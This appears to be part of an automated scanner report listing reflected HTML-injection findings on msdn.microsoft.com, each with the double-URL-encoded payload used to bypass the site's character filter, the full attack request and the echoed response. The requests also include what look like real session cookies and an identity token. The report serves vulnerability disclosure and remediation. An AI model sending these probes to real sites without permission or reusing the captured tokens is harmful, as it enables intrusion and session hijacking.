P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:11 GMT
Content-Length: 9189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarycbb0d"><a>61e6c453a14/ms689718(VS.85)" />
...[SNIP]...

2.116. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598c0%2522%253e%253ca%253e64b1072645f was submitted in the REST URL parameter 3. This input was echoed as 598c0"><a>64b1072645f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms689718(VS.85).aspx598c0%2522%253e%253ca%253e64b1072645f HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:41 GMT
Content-Length: 9198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(VS.85).aspx598c0"><a>64b1072645f" />
...[SNIP]...

2.117. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9acb%2522%253e%253ca%253e41d5fa23755 was submitted in the REST URL parameter 1. This input was echoed as d9acb"><a>41d5fa23755 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd9acb%2522%253e%253ca%253e41d5fa23755/library/ms689718(v=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd9acb"><a>41d5fa23755/library/ms689718(v=vs.85" />
...[SNIP]...

2.118. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f03%2522%253e%253ca%253e6c8979e7095 was submitted in the REST URL parameter 2. This input was echoed as f0f03"><a>6c8979e7095 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryf0f03%2522%253e%253ca%253e6c8979e7095/ms689718(v=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryf0f03"><a>6c8979e7095/ms689718(v=vs.85" />
...[SNIP]...

2.119. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2915%2522%253e%253ca%253e82109de73e3 was submitted in the REST URL parameter 3. This input was echoed as a2915"><a>82109de73e3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms689718(va2915%2522%253e%253ca%253e82109de73e3=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(va2915"><a>82109de73e3=vs.85" />
...[SNIP]...

2.120. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5739%2522%253e%253ca%253e5aed2fa913e was submitted in the REST URL parameter 1. This input was echoed as d5739"><a>5aed2fa913e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd5739%2522%253e%253ca%253e5aed2fa913e/library/ms689718(v=vs.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:54 GMT
Content-Length: 9192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd5739"><a>5aed2fa913e/library/ms689718(v=vs.85)" />
...[SNIP]...

2.121. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4104c%2522%253e%253ca%253eafd812d233f was submitted in the REST URL parameter 2. This input was echoed as 4104c"><a>afd812d233f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library4104c%2522%253e%253ca%253eafd812d233f/ms689718(v=vs.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; 
A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
